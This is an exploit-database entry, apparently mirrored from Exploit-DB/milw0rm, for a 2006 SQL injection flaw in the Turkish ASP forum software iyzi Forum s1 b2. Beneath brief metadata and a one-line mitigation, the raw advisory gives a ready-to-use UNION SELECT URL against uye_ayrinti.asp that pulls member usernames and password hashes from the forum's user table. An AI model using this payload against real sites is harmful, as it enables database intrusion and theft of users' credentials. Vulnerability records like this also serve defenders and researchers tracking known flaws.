header-logo
Suggest Exploit
vendor:
iyzi Forum s1 b2 (tr)
by:
Fix TR
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: iyzi Forum s1 b2 (tr)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

iyzi Forum s1 b2 (tr) SQL Injection Vulnerability

An SQL injection vulnerability exists in iyzi Forum s1 b2 (tr) due to improper sanitization of user-supplied input to the 'uye_ayrinti.asp' script. An attacker can exploit this vulnerability to gain access to the application's database and execute arbitrary SQL commands. The password is encrypted with SHA-256.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the database.
Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability      +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In         : uye_ayrinti.asp
Risk           : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256

# milw0rm.com [2006-09-24]